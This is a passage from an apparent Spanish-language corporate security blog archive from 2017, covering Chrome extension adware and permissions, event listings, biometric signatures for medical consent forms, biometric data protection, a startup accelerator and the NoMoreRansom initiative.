extensiones con adware las alberga fuera del market 2) Comprando extensiones reputadas De nuevo, el modelo es muy parecido a lo que ocurre con las aplicaciones Android, por ejemplo. Se buscan extensiones con una buena base de usuarios que hayan realizado usuarios amateurs, y se ofrece un buen dinero al desarrollador por tomar el control de esa extensión. La mayoría, que ya no tienen tiempo de mantenerla o que no saben cómo monetizarla, ven un buen negocio para el tiempo que le han dedicado a su desarrollo. Así que acceden. Pero desde hace ya un tiempo se intuye que esto es garantía de que la extensión se convierta en adware. Existen multitud de testimonios de desarrolladores que han visto como sus decenas de miles de usuarios le recriminan haberlos finalmente infectado cuando "vendió" su creación. Aquí, el atacante actúa con cierta cautela, poco a poco, para no perder su inversión y que sea retirada demasiado pronto la extensión (que lo será, finalmente). Robando extensiones Esto es lo que ha pasado en estas últimas semanas. De alguna forma han conseguido la contraseña de desarrollador de las extensiones populares y han modificado su código. Sin más, en un intento desesperado de monetizar con adware la jugada. Desesperado, porque el dueño o los usuarios alertan sobre la modificación en poco tiempo, y o bien el desarrollador legítimo o la propia Google eliminarán relativamente rápido el problema. ¿Por qué tanto interés en las extensiones? Las extensiones de Chrome son pequeños programas que pueden modificar y mejorar las funcionalidades de Chrome. Habitualmente usan HTML, JavaScript, CSS, etc., y generalmente cuentan con una escasa interfaz de usuario, en ocasiones limitada a un icono añadido a la barra de navegación de Chrome. Todos sus ficheros suelen estar agrupados en un zip y el funcionamiento no suele depender del contenido del web, aunque puede interactuar libremente con él, alterando lo que vemos en la web, enviándolo a un tercero, tomando la decisión de hacia donde navegamos, etc. Algo muy potente y que por tanto se regula con un sistema de permisos. El último clic en el proceso de instalación está reservado para que el usuario decida si quiere dar estos permisos a la extensión. Ejemplo de cómo se muestran los permisos de una extensión cualquiera En el ejemplo mostrado en la imagen, autorizamos a la extensión a que lea y modifique todos los datos de los sitios web que visitemos. Las autorizaciones necesarias a las diferentes extensiones están detalladas en un fichero .json (el manifest) en el que se detallan algunas características del extensión (versión, descripción, etc.), y entre ellas los permisos. En el caso del ejemplo en la imgaen podemos ver que se traducen en: "tabs", "browsingData", "notifications", "webRequest", "webNavigation", "http://*/", "https://*/" O sea, acceso a las notificaciones, más todas las tabs (pestañas), los datos de navegación e incluso acceso a cualquier página http o https. ¿Cuántos permisos hay y cuáles son los más populares? En ElevenPaths realizamos un pequeño experimento. Descargamos más de 300 extensiones de diferentes categorías y las analizamos. Más de un 20% de estas extensiones pide acceder a las pestañas y al almacenamiento. Las expresiones regulares http://* y sus variantes, indican que no tienen restricción de actuación, y que pueden aplicar estos permisos allá donde lo deseen. Menos populares son permisos como gcm, que permite acceder al sistema de mensajería en cloud del propio Google. También nos preocupamos por el número de permisos. La inmensa mayoría pide menos de 15 permisos, aunque podemos observar excepciones como Free Proxy to Unblock Any Sites que pueden llegar a necesitar hasta 42 permisos. El problema es que si bien queda claro en el fichero en sí, no queda tan claro al usuario que lo está instalando. Esto es lo que ve el usuario, pero en realidad acepta 42 permisos En la imagen, no se muestra el manifest y los permisos reales que se están concediendo como: "permissions": [ "u003Call_urls>", "tabs", "storage", "proxy", "identity", "notifications", "webRequest", "webRequestBlocking", "activeTab", "alarms", "contextMenus", "declarativeContent", "gcm", "identity", "idle", "gcm", "history", "identity", "idle", "management", "nativeMessaging", "notifications", "pageCapture", "power", "proxy", "sessions", "tabCapture", "tabs", "topSites", "webNavigation", "webRequest", "contextMenus", "webNavigation", "cookies", "unlimitedStorage", "management", "idle", "chrome://favicon/", "chrome://favicon/*", "http://*/*", "https://*/*", "background" ], Así, el mundo de las extensiones hereda en buena parte lo que viene pasando con las apps en Android, por ejemplo. Existen fuentes oficiales y no oficiales. No podemos fiarnos de las fuentes no oficiales (fuera del market oficial), pero tampoco demasiado del oficial por varias razones: Los desarrolladores legítimos son atacados y pueden perder el control. Los desarrolladores con pocos escrúpulos, pueden crear o comprar y publicar extensiones con no muy buenas intenciones. Los permisos son siempre un problema para el usuario que no termina de entender qué significan y qué impacto tienen. De hecho, en una extensión con un número elevado de permisos, ni siquiera se muestran adecuadamente al usuario... algo muy parecido como decíamos al quebradero de cabeza que sufre Android para solucionar esto, y que le obligó a agrupar por permisos para intentar hacer entender al usuario qué estaba instalando... sin mucho éxito, creemos, por su parte. Desde hace bien poco (finales de agosto), Chrome ha anunciado que intentará mejorar la seguridad de las extensiones alertando de una manera más llamativa al usuario sobre la potencia de las extensiones. Aparecerá en la versión 62 de Chrome, y mostrará mensajes más visibles, por ahora si cambian la pestaña de "Home" o si se detecta tráfico "sospechoso" a través de un proxy. Insuficiente todavía, pero seguro que será mejorado en breve. Más información aquí. Así mostrará Chrome ciertas alertas de seguridad sobre las extensiones. Fuente: BleepingComputer.com Aruna Prem arunaprem.bianzino@global.11paths.com Sergio de los Santos ssantos@11paths.com @ssantosv
4 de septiembre de 2017
Back to school! Traemos la agenda de eventos de septiembre en ciberseguridad y hacking
Volvemos con las pilas cargadas para empezar septiembre con una selección de diferentes eventos en los que desde ElevenPaths participaremos en charlas y conferencias. ¡Toma nota y participa! Encuentro Nacional de seguridad de la información de entidades financieras y sus clientes. El mes empieza fuerte con el Forum de seguridad en entidades financieras y sus clientes celebrado el día 1 de septiembre en Argentina, en el que Claudio Caracciolo, nuestro CSA en Argentina participará con la charla Respuesta efectiva a incidentes. En su web puedes encontrar todos los detalles sobre el evento. Bsidesco El día 1 de septiembre se celebra el evento Bsidesco, en el que Diego Espitia, nuestro CSA en Colombia participará con la charla Resilence: No Woman No Cry. ¡Echa un vistazo a uno de los eventos técnico gratuitos más importantes del país! ToorCON Durante la primera semana de septiembre, nuestro Chairman, Chema Alonso, estará de nuevo en ToorCON, un evento de largo recorrido en el que ya participó en 2008. En su intervención hablará sobre DirtyTooth y contará con la colaboración de Santiago Hernández, compañero de ElevenPaths, quién junto a Alejandro Ramos, explicará su experiencia en el Máster de Seguridad de la UEM titulado WinReg MiTM: Simple Injection and Remote Fileless Payload Execution o como hackear sistemas Microsoft Windows con inyecciones en el registry por red. ¡No te lo pierdas! Summit País Digital Este evento también contará con la participación de nuestro Chairman, Chema Alonso, en su V edición que se celebra durante los días 5-6 de septiembre en Chile. Concretamente estará presente en una keynote. Puedes conseguir toda la información directamente en su página web oficial. Paralelamente al Summit País Digital, Chema Alonso estará también presente el día 5 de septiembre en una sesión de preguntas y respuestas de la Universidad de Chile en la que responderá a todas las cuestiones que se realicen en sala durante el acto. ¡Mantente atento! Security Innovation Day 2017_ Chile Security Innovation Day, el evento del año sobre ciberseguridad e innovación de ElevenPaths, aterriza por primer vez el día 6 de septiembre en Santiago de Chile. Durante esta jornada presentaremos de la mano de nuestros expertos en ciberseguridad y nuestros partners, las nuevas soluciones e integraciones tecnológicas de Telefónica y ElevenPaths para hacer frente a los distintos tipos de ciberamenazas. Comparte una mañana para hablar de ciberseguridad y servicios profesionales con Chema Alonso, Chief Data Officer de Telefónica, Rames Sarwat, VP de Alianzas Estratégicas de ElevenPaths y Gabriel Bergel, CSA de ElevenPaths en Chile. ¡Inscríbete aquí! TIC Fórum 2017_México Por sexto año Telefónica organiza el TIC Fórum, un evento referencial para Empresas, Negocios, y Organismos Gubernamentales. Este es el espacio donde se presentan las nuevas tecnologías y tendencias en telecomunicaciones. El día 24 de septiembre Diego Espitia, nuestro CSA en Colombia, participará en la edición de México, con dos charlas llamadas: ¿Sabes lo que sucede en la red? y Los metadatos revelan secretos de Estado. ¡No te lo pierdas! Ekoparty Además, durante los días 27, 28 y 29 de septiembre se celebra el evento anual de seguridad informática en Buenos Aires, Argentina. Nuestro CSA Claudio Caracciolo celebrará el día 28 de septiembre con la charla The bicho: an advanced car backdoor maker. En la web oficial tenéis toda la información. ElevenPaths Talks Como venimos haciendo durante todo el año, los jueves a las 15.30h (CET) te esperamos en nuestra serie de webinars onlines gratuitos sobre las temáticas de más interés y actualidad en el sector de la seguridad. Durante este mes de septiembre tendremos dos sesiones impartidas por nuestros expertos CSAs. Estos son los próximos webcast a los que te puedes apuntar de manera gratuita: 7 de septiembre de 2017: Asegurando sistemas industriales por Gabriel Bergel y Carlos Ávila. En esta sesión, nuestros expertos nos mostrarán con qué tecnologías contamos para poder proteger las redes industriales y qué aspectos están destinados a fracasar. 21 de septiembre de 2017: Fog / Edge / Cloudlet Computing por Carlos Ávila y Claudio Caracciolo. En este talk, nuestros expertos resolverán la duda sobre el término Fog Computing, o Edge Computing, ¿estaremos nuevamente ante ingeniosos nombres de marketing o realmente será algo diferencial en el mundo del IoT? Si te has perdido los anteriores capítulos, recuerda que puedes verlos en nuestro canal de YouTube de la serie ElevenPaths Talks - Season 3. Code Talks for Devs Además, este mes estrenamos los nuevos webinars Code Talks for Devs dedicados a desarrolladores y en los que trataremos temáticas sobre lenguajes de programación, código, integraciones técnicas, APIS y ¡mucho más! Las sesiones de este mes serán las siguientes: 13 de septiembre de 2017: Di adiós al ‘polling’ en Latch con los nuevos Webhooks por Javier Espinosa. En esta sesión, nuestro experto te cuenta de primera mano cómo crear, configurar y utilizar los webhooks de Latch a partir de NodeJS. 27 de septiembre de 2017: SDK de Go para Latch por Fran Ramírez y Rafael Troncoso, además de un invitado especial. En este webinar, nuestros expertos te explican cómo crear un SDK para Go, el lenguaje de programación de Google. Nosotros lo hemos aplicado en Latch, Esperamos que alguna de estas citas sean de vuestro interés, y nos veamos presencialmente o por Internet. ¡Feliz reéntre hackers!
31 de agosto de 2017
ElevenPaths en el 2º Simposio en Global Cybersecurity Awareness Messaging de Viena
Durante los días 30 y 31 de agosto de 2017 se celebra el 2º simposio en Campañas de concienciación de ciberseguridad global ( 2nd Global Cybersecurity Awareness Messaging) en Viena. El objetivo de este encuentro aborda el desarrollo de programas para la sensibilización en ciberseguridad y para ello, en este encuentro se discutirá la estrategia global a seguir para definir una serie de campañas adecuadas de concienciación que puedan transmitir un mensaje efectivo, claro y conciso sobre la ciberseguridad global. Una representación del equipo de innovación y laboratorio de ElevenPaths asistirá aportando su experiencia en el simposio. A partir del 2017, el APWG tratará de inspirar a los gobiernos de países clave, agentes del sector privado, entidades mercantiles y organizaciones a adoptar enfoques adecuados para mejorar los comportamientos de los usuarios respecto a las TIC. La idea del simposio celebrado en Viena este año, será la de desarrollar programas de sensibilización e identificar los instrumentos de medición necesarios para que los ciudadanos formen parte de la solución al cibercrimen, informando sobre los riesgos en las Tecnologías de la Información y las Comunicaciones. De forma complementaria, reputados investigadores senior de diversas universidades y laboratorios presentarán sus estudios en este sentido. Además, algunos comisarios nacionales de Stop, Think & Connect de Suiza, EEUU, Japón y España presentarán sus lecciones aprendidas en el desarrollo de sus propias campañas de concienciación. La agenda de este evento puede ser consultada aquí. El APWG (Anti Phishing Working Group) es una coalición internacional que pretende unificar la respuesta global al cibercrimen a través de la industria, los gobiernos y el cumplimiento de la ley. Los proyectos de este grupo desde su fundación en el año 2003 han ayudado a la creación de importantes instituciones e iniciativas contra el cibercrimen. El APWG está formado por más de 2000 instituciones de todo el planeta, donde directores, gestores e investigadores de sus socios asesoran las actuaciones de diversos gobiernos nacionales; órganos de gobierno internacionales como la ICANN y organizaciones multilaterales como la Comisión Europea, The Council of Europe's Convention on Cybercrime, la Oficina de las Naciones Unidas contra la Droga y el Delito (UNODC), la Organización para la Seguridad y la Cooperación en Europa (OSCE) y la Organización de Estados Americanos (OEA). Este simposio está organizado por el APWG.EU, que es el capítulo europeo del APWG con sede en Barcelona y establecida en 2013 como una fundación para la investigación científica sin ánimo de lucro para el beneficio de la lucha contra el cibercrimen en Europa. Este evento se enmarca dentro del programa internacional y campaña de concienciación Stop, Think & Connect. Una iniciativa cofundada por el APWG que fue lanzada en octubre del 2010 y forma parte de las estrategias internacionales para la concienciación en seguridad online global, ayudando a todos los ciudadanos digitales a adquirir una mayor protección y seguridad. Esta campaña fue impulsada también por la National Cyber Security Alliance (NCSA), que actualmente lidera el proyecto, apoyada a su vez por el gobierno de los Estados Unidos, incluyendo la Casa Blanca, y el departamento de Homeland Security. La campaña Stop, Think & Connect tiene una máxima: ayudar a la gente a comprender no solo los riesgos del uso de internet sino la importancia de adquirir y ejercitar un comportamiento seguro durante la navegación online
28 de agosto de 2017
Una sanidad conectada y sin papeles
Durante los juicios de Nüremberg, celebrados entre 1945 y 1946, se juzgaron a un grupo de 24 doctores por realizar experimentos en prisioneros de guerra en los campos de concentración nazi durante la Segunda Guerra Mundial. A raíz de este juicio y sus deliberaciones posteriores, se creó el Código de Nüremberg, publicado el 20 de Agosto de 1947, que establece los principios que han de regir en la experimentación con seres humanos. El código está formado por diez puntos entre los que se incluye el Consentimiento Informado (CI) y cuya finalidad era garantizar el derecho legal de toda persona a decidir libremente sobre su participación en un experimento médico. En la actualidad, el Consentimiento Informado es un proceso de relación entre el profesional sanitario y paciente. El paciente recibe del profesional sanitario una información comprensible y suficiente que le permite participar en las decisiones respecto a su diagnóstico y tratamiento, garantizando su libertad en la toma de decisiones que afectan a su salud. En aquellos procedimientos que implican riesgos significativos para la salud del paciente, el proceso debe ser presentado por escrito dando lugar al Formulario de Consentimiento Informado (FCI). El FCI es específico para el paciente y su tratamiento, y debe estar firmado y fechado tanto por el profesional sanitario como por el paciente o su representante legal y una copia del formulario de consentimiento firmado estará siempre disponible para el paciente y para su médico. Ilustración 1: El formulario de Consentimiento Informado (FCI) para intervenciones de riesgo para la salud del paciente Todos los hospitales y clínicas, tanto públicas como privadas, gestionan hoy en día millones de estos documentos para cumplir con la legislación y normativa vigente. Los FCI firmados pasan a formar parte de la historia clínica del paciente, y por tanto, deben ser custodiados a largo plazo junto como parte de su historia clínica. En muchos centros sanitarios, el FCI es hoy un documento en papel, que debe ser impreso y posteriormente firmado. Por lo general, después de su firma el documento se envía para su digitalización con el fin de ser anexado a la historia clínica electrónica del paciente y el original en papel a un archivo físico para su custodia. La gestión de los FCI requiere dedicación de recursos administrativos e implica ciertos riesgos para el centro relacionados con su extravío o deterioro, error en su indexado y dificultad de control para asegurar que se cumple con esta obligación. Al mismo tiempo obliga a mantener costosos archivos físicos de documentos. La transformación del FCI en un documento electrónico supone muchas ventajas desde el punto de vista de costes, seguridad y eficiencia en su gestión pero se encuentra con el desafío de su firma. Aunque desde hace tiempo es posible la firma digital de documentos electrónicos, para ser una firma legal en España, requiere que los firmantes dispongan de un certificado digital emitido por una autoridad de certificación reconocida e incluida en el registro que mantiene el Ministerio de Energía, Turismo y Agenda Digital. Se trata por tanto de encontrar un método que cuenten con validez suficiente desde el punto de vista legal para la firma de los FCI en formato electrónico y al mismo tiempo sea universal y fácil de utilizar. Quizá, el hecho de ser el país europeo que más documentos de identificación electrónica ha emitido (hasta la fecha más de 31 millones de DNI electrónicos) y que dicho documento contenga un certificado digital reconocido nos puede hacer pensar en que sería el método apropiado para la firma de los FCI. Sin embargo, hay que tener en cuenta que el uso de la faceta electrónica del DNIe es muy bajo, no toda la población dispone de él y en el ámbito sanitario se atienden a muchas personas que o bien no disponen de él (p.e. extranjeros) o bien no saben o quieren usarlo (p.e. personas mayores). También es razonable pensar en proporcionar una tarjeta profesional con chip a todos los profesionales sanitarios que contenga un certificado digital que les acredite como profesionales sanitarios y les permita firmar electrónicamente mediante su posesión y el conocimiento de un número personal (PIN). Sin embargo, este esquema no parece viable para ser extendido por su complejidad y altos costes. Ilustración 2: La firma de los profesionales sanitarios de los FCI (licencia CC) La firma digitalizada con parámetros biométricos (firma biométrica) se basa en la firma manuscrita de una persona realizada sobre un dispositivo con pantalla táctil que durante la firma registra parámetros como la velocidad y presión. A partir de estos datos capturados, un algoritmo matemático genera un patrón caligráfico único para cada persona que permite verificar en cualquier momento que esa persona y sólo ella ha firmado ese documento. Estos algoritmos biométricos de firma digitalizada se basan en la traslación al mundo digital de las técnicas empleadas desde hace años por los peritos calígrafos con el fin de determinar la autoría de una firma en papel y su validez desde el punto de vista legal como método de firma. Con esta firma se permite demostrar que el autor de la firma es quien dice haberla hecho (autenticidad) y sirve como método o forma de mostrar la aprobación sobre lo firmado (consentimiento). Mediante la combinación de algoritmos biométricos y la firma digital es posible conseguir un método de firma universal de FCI en formato electrónico que pueda ser firmado de forma similar a como se firma hoy un formulario en papel y con validez legal en caso de disputa judicial. Esta validez legal ha sido constada a través de estudios realizados por prestigiosos despachos de abogados y por peritos calígrafos independientes. La gestión de los FCI en formato electrónico permite un ahorro significativo de costes con un retorno rápido de la inversión, en la mayoría de los casos, en un periodo inferior a un primer año además de mejorar el cumplimiento legislativo y normativo y proporcionar mayor eficiencia al proceso. La tecnología de firma digitalizada biométrica de ElevenPaths, denominada SealSign BioSignature, ha permitido a diferentes entidades sanitarias implantar con éxito la firma de los FCI con una excelente aceptación por parte de los pacientes y los profesionales sanitarios, contribuyendo a reducir los costes asociados a la gestión de dichos documentos en papel y asegurar el cumplimiento legal. Rames Sarwat Head of Strategic Alliances & Partnerships rames.sarwatshaker@telefonica.com @ramessarwat
23 de agosto de 2017
Cuidado con a quién entregas tus datos biométricos. Parte 2.
Si sucede que nuestro usuario y contraseña se ven expuestos, nos vemos obligados a cambiar nuestra contraseña para volver a una situación de control de nuestra identidad. Sin embargo, en caso de que uno de nuestros rasgos se vea comprometido y lo estemos usando para proteger el acceso a nuestra información, no tenemos la posibilidad de cambiar nuestro rasgo (al menos de forma fácil) para volver a retomar el control. En el caso de los rasgos conductuales, como es el caso de la voz o la firma, podríamos llegar a modificarlos pero imagino que coincidimos con que no sería muy deseable. El impacto de ver comprometidos nuestros datos biométricos es tan alto que la Comisión Europea financió desde el año 2008 al 2011 el proyecto TURBINE (TrUsted Revocable Biometric IdeNtitiEs) que tenía como objetivo crear identidades biométricas revocables. La mayoría de los terminales móviles que gestionan datos biométricos, como smartphones y tabletas, disponen de un chip de seguridad o una zona especial en su procesador en el que se almacena la información biométrica de los usuarios del dispositivo, así como el algoritmo de comparación formando lo que se conoce como un entorno confiable de ejecución (TEE – Trusted Execution Environment). Cuando una app quiere verificar una identidad, no tiene acceso ni a los datos biométricos capturados por el sensor, ni a los almacenados, ni al algoritmo de comparación. Tan solo recibe el resultado de la comparación realizada evitando que una app maliciosa pudiera hacerse con nuestros datos. Vamos con un ejemplo de este TEE. El DNI electrónico español (no lo puedo evitar, acabo siempre hablando de él) dispone en su chip de dos de nuestras huellas dactilares almacenadas y del algoritmo de comparación en su interior que permite que en caso de olvidarnos del PIN de la tarjeta podamos acudir a una comisaría y en unos kioscos bastionados podamos capturar nuestra huella y establecer un nuevo PIN, todo ello de forma desatendida. El chip del DNI y su sistema operativo, que cuenta con la certificación de seguridad Common Criteria EAL4 actúa como TEE para nuestros datos biométricos. El reconocimiento biométrico hace más usable y conveniente para el usuario los procesos de autenticación. En la actualidad existen múltiples librerías y servicios online que nos permiten incorporar a nuestras apps y aplicaciones de escritorio mecanismos de reconocimiento biométrico de forma muy sencilla, pero es importante que nos planteemos que la responsabilidad de la custodia de dichos datos biométricos generados es exclusivamente nuestra y que debemos asegurarnos en la medida de lo posible que dichos datos no quedan expuestos o puedan ser manipulados. Si por un error u omisión, nuestra aplicación o apps permite que los datos biométricos de nuestros clientes, empleados o proveedores se vean expuestos, como dice nuestro Chairman Chema Alonso, solo habrá una cosa que podremos hacer y es decir “Lo siento”. Ya no tendremos una nueva oportunidad para corregir el problema generado. Si os estáis planteando incorporar a vuestra app un reconocimiento biométrico, es conveniente verificar las medidas de seguridad que incorporan las librerías o servicios web que pensáis utilizar, saber si estos cuentan con alguna certificación de seguridad y si se apoyan en mecanismos seguros de custodia de información como los TEE de los terminales. Adicionalmente, no está de más que verifiquéis vuestra app con algún sistema de análisis de vulnerabilidades de aplicaciones móviles como mASAPP de ElevenPaths. Esta herramienta es capaz de analizar en tiempo real e identificar de manera continua los riesgos de seguridad. Si por el contrario la aplicación en la que os estáis planteando incorporar un reconocimiento biométrico está basada en tecnología web, en este caso por la arquitectura de las aplicaciones web, mucho cuidado con los componentes y librerías que seleccionáis. Aquellos componentes basados en lenguajes, como JavaScript, al ejecutarse en el navegador y tener su código fuente accesible son muy vulnerables a ataques que permiten capturar, manipular o incluso inyectar datos biométricos a la aplicación. Ataques como XSS (del inglés Cross-Site Scripting) permitirían ejecutar en páginas web visitadas por el usuario códigos JavaScript que podrían manipular o exponer los datos biométricos. Es conveniente evitar este tipo de librerías dado que, aunque pueden ser muy convenientes, su uso pone en riesgo la identidad y datos personales de los usuarios de nuestra aplicación. Es una buena idea invertir tiempo y esfuerzo en hacerle la vida más fácil al usuario incorporando un reconocimiento biométrico en lugar de hacerle recordar complicadas passwords, pero el uso de éste nos puede generar una falsa sensación de seguridad. La biometría por sí sola no es más robusta que una contraseña y es una buena idea combinarla con otros factores de autenticación generando sistemas multifactor para hacerlos más seguros y usables. Los algoritmos de reconocimiento requieren de entornos seguros para la captura, extracción, almacenamiento y comparación de los datos generados. Sin ellos estaremos generando un entorno más vulnerable y de riesgo para las personas que utilicen nuestros sistemas. Nuestra recomendación es utilizar sistemas que hayan sido verificados y que cuenten con medidas de seguridad suficientes para no tener que lamentar fugas de información. Tengamos en cuenta que si exponemos las identidades biométricas de clientes, proveedores o empleados al intentar mejorar la usabilidad corremos un riesgo elevado que puede tener consecuencias de fugas de seguridad y de multas con una legislación cada vez más concienciada y vigilante con estos temas. Más información: Cuidado con a quién entregas tus datos biométricos. Parte 1. Rames Sarwat VP de Alianzas Estratégicas y Partnerships rames.sarwatshaker@telefonica.com @ramessarwat
18 de agosto de 2017
INCIBE abre la convocatoria de su programa de aceleración internacional en ciberseguridad para startups con la colaboración de ElevenPaths
El Instituto Nacional de Ciberseguridad de España (INCIBE), entidad dependiente del Ministerio de Energía, Turismo y Agenda Digital, en su apuesta por el crecimiento de la ciberseguridad ha abierto la convocatoria de su Programa Internacional de Aceleración Cybersecurity Ventures. Un programa que ofrecerá un apoyo intensivo a los equipos de una selección de 10 startups en forma de capacitación, mentorización y vinculación con inversores, con el objetivo de madurar los negocios para atraer inversiones y ayudarlos a captar los primeros clientes. La iniciativa cuenta con la colaboración de la Junta de Castilla y León, a través del Instituto para la Competitividad Empresarial de Castilla y León (anteriormente ADE) y el Instituto Leonés de Desarrollo, Formación y Empleo (ILDEFE). Una colaboración que se ha materializado en un convenio suscrito por Pilar del Olmo, consejera de Economía y Hacienda de la Junta de Castilla y León, Alberto Hernández, director general de INCIBE y Antonio Silván, alcalde de León, en representación de ILDEFE. El acuerdo entre los tres organismos tiene como objeto la promoción del emprendimiento en ciberseguridad mediante el apoyo a la atracción de talento (incubadora de ideas) y la aceleración de proyectos emprendedores en materia de ciberseguridad que se ubicarán en León. Desde ElevenPaths apoyamos las iniciativas de emprendimiento en el área de ciberseguridad con colaboraciones con aceleradoras como Wayra e INCIBE Ventures. Nuestro CEO, Pedro Pablo Pérez, participará en el comité científico que contribuirá a la evaluación de los proyectos presentados. La Junta de Castilla y León, a través del Instituto para la Competividad Empresarial, proporcionará espacios gratuitos en el Parque Tecnológico de León para las fases de incubación y aceleración de proyectos. Además, en el marco del plan de acogida a startups, facilitará a los emprendedores un paquete de servicios especializados y ayudas y financiación a través de la Lanzadera Financiera. El Ayuntamiento de León, a través de Ildefe, promueve desde hace más de una década la actividad empresarial y comercial, favoreciendo la creación de empleo y emprendimiento. Colaborará en los servicios formativos y de consultoría a impartir en la incubadora de ideas y la aceleradora de proyectos y en los premios del concurso de aceleradora, así como en la difusión del proyecto en el tejido empresarial y emprendedor. Más información en incibe.es
17 de agosto de 2017
Cuidado con a quién entregas tus datos biométricos. Parte 1.
Aunque los sistemas de reconocimiento biométrico existen hace décadas, en los últimos años hemos visto cómo se han popularizado su uso con su integración en smartphones y tabletas. Especialmente hemos visto la adopción masiva de la huella dactilar como método seguro de desbloqueo en terminales de gama media y alta, aunque también existen otros métodos de reconocimiento biométrico de personas integrados en diversas apps como el reconocimiento facial en 2D o 3D, de iris, de voz o del patrón caligráfico. El reciente Samsung Galaxy S8 incorpora un avanzado sistema de reconocimiento de iris y previsiblemente el próximo iPhone incorporará un sistema de reconocimiento facial 3D dejando atrás el sensor de huella. Ilustración 1: Reconocimiento de Iris (licencia CC) La palabra biometría proviene de la combinación del termino griego bios que significa vida y del termino metron que significa medida. Entendemos por tanto la biometría como la ciencia que estudia el reconocimiento inequívoco de personas basado en uno o más rasgos físicos intrínsecos o bien de su conducta (conductuales). Los rasgos como la huella dactilar, su cara, su iris, etc. son rasgos intrínsecos. Estos rasgos son parte de la persona que no pueden cambiarse, salvo que esta se sometiese a una cirugía. Los rasgos conductuales son rasgos que reflejan la conducta del individuo y que si este quisiera podría cambiarlos, aunque en muchos casos le supondría un importante esfuerzo. Ejemplos de estos rasgos son la forma de andar, de hablar, de escribir, etc… Los sistemas de reconocimiento biométrico consisten casi siempre en un proceso muy similar. Se trata de capturar una imagen o muestra del rasgo biométrico a comparar, procesarlo para extraer un cierto número de características (p.e. puntos característicos de la huella dactilar conocidos como minucias como en la ilustración), codificar estas características extraídas en un vector y ejecutar un algoritmo de comparación de este vector con uno almacenado que damos por cierto y que pertenece al individuo al que queremos reconocer. A estos dos procesos se les conoce como procesos de extracción y de comparación de las características biométricas. Ilustración 2: Tipos de minucias de una huella dactilar (licencia CC) Existen factores que hacen que dos muestras de una misma persona tomadas en diferente momento no sean exactamente iguales. Esta diferencia se puede deber a factores externos como por ejemplo en el caso de la captura de la huella dactilar. Estos factores pueden ser el uso de diferentes dispositivos de captura con características diferentes de resolución y tecnologías de captura, la suciedad del lector, la posición del dedo durante la captura o su movimiento, la sudoración del individuo, las a enfermedades o heridas que producen alteraciones de la piel del dedo, las condiciones medioambientales como humedad, calor, etc… Por tanto, tenemos que esta comparación de vectores es compleja y su resultado no es certero sino probabilístico. El resultado de dicha comparación devuelve habitualmente una puntación o score que indica normalmente la probabilidad de que ambas huellas sean de la misma persona. En general se establece un umbral a partir del cual se asume como cierto el cotejo de ambas huellas admitiendo que puede existir un mínimo error. Si el umbral se establece muy alto se producen casos conocidos como falsos negativos (FRR - False Rejection Rate en inglés), es decir, que un usuario legítimo es rechazado puesto que el score que devuelve el algoritmo de comparación está por debajo del umbral fijado. Este comportamiento es molesto para el usuario, pero desde el punto de vista de la seguridad supone riesgo de acceso no autorizado. Digamos que hacemos que el algoritmo de comparación sea excesivamente estricto. Sin embargo, si establecemos el umbral muy bajo permitiremos que se produzcan los temidos falsos positivos (FAR – False Acceptance Rate), es decir, que el algoritmo dará por buena la comparación de una huella de otra persona y permitirá el acceso a un usuario no legítimo. El ajuste del algoritmo de comparación de biométrica se realiza estableciendo el umbral en su punto óptimo donde se minimice el número de errores producidos, tanto los falsos positivos (FAR – False Aceptance Rate) y los falsos negativos (FRR – False Rejection Rate), minimizando un índice combinado que se conoce EER ( Equal Error Rate). Ilustración 3: Calculo de la tasa de error equivalente (EER) en un sistema biométrico (licencia CC) Desde el punto de vista de la seguridad y de la privacidad, uno de los riesgos más importantes es el tratamiento que se realiza de los datos biométricos. Los algoritmos de extracción procesan la imagen o muestra capturada para extraer un vector de características y de forma inmediatamente posterior suelen descartar la imagen o muestra procesada para evitar que sea comprometida almacenando sólo el vector de características. En general, a partir del vector de características extraídas no es posible recrear la imagen o muestra, ya que el vector tiene mucha menos información que la imagen o muestra, aunque la verdad es que ya existen aplicaciones que son capaces de crear muestras simuladas a partir de un vector de características. Por ejemplo, a partir de un vector de minucias o puntos característicos de una huella, algunas aplicaciones son capaces de componer una imagen de una huella completa aleatoria que al ser procesada genera el mismo vector de características que el indicado. Luego ya sólo quedaría imprimir dicha huella (os aseguro que es más fácil de lo que pensáis) y tratar de engañar al lector y algoritmo de comparación para suplantar al usuario legítimo. Para evitar las suplantaciones, casi todos los algoritmos incorporan técnicas conocidas como antispoofing. En el caso de la huella dactilar, los sensores incorporan tecnología para el liveness detection (detección de vida) mediante diversas técnicas entre las que destacan la medición de la conductividad de la piel humana durante la captura. En caso de usar plásticos o pieles sintéticas impresas con una huella dactilar, al no ser conductoras de electricidad, serían detectadas y rechazadas. En otros rasgos, para evitar falsificaciones a través de una grabación de la voz, una foto o video de la cara o el iris,… se le pide al usuario que realice una variación (p.e. que lea un texto aleatorio en caso de la voz, que guiñe un ojo, sonría o gire la cabeza en caso del reconocimiento facial, que pestañee en caso del iris o medidas anti-suplantación similares). Por ello es muy importante que ni la imagen o muestra capturada ni el vector de características extraídas por el algoritmo de comparación se puedan ver comprometido. En caso de que esto sucediera, las consecuencias pueden llegar a ser catastróficas para el individuo. Más información: Cuidado con a quién entregas tus datos biométricos. Parte 2. Rames Sarwat VP de Alianzas Estratégicas y Partnerships rames.sarwatshaker@telefonica.com @ramessarwat
16 de agosto de 2017
Un año de NoMoreRansom.org, donde ElevenPaths es entidad asociada
Hace un año, el 25 de julio de 2016, la iniciativa No More Ransom comenzó gracias al esfuerzo de la Policía Nacional Holandesa, Europol, McAfee. Hoy ya son más de 100 los socios que se han unido a ella con el ánimo de prevenir y mitigar los principales ataques de ransomware que continúan dominando las noticias y golpeando a empresas, gobiernos e individuos de todo el mundo. Durante este año, la plataforma ha conseguido descifrar 28.000 dispositivos este año, y ElevenPaths forma parte del consorcio como entidad asociada gracias al desarrollo una de estas herramienta de descifrado. La plataforma www.nomoreransom.org tiene el claro objetivo de, por un lado , asistir y permitir a las víctimas del ransomware la recuperación de su información cifrada sin tener que pagar a los criminales. Por otro, perseguir desde el plano legal a los responsables de estas estafas compartiendo información entre las fuerzas de seguridad. ElevenPaths aporta su experiencia en este campo desarrollando y ofreciendo gratuitamente una herramienta a esta iniciativa, lo que gracias a la labor del área de innovación y laboratorio, le ha permitido formar parte del consorcio, como una de las nueve entidades asociadas, junto con, entre otras, Avast, Bitdefender, CERT de Polonia, Check Point, Emsisoft y Kasperksy. La amenaza del ransomware está aumentando El Ransomware se ha disparado desde 2012, con los atacantes atraídos por la promesa de beneficios económicos y una fácil implementación. La amenaza continúa 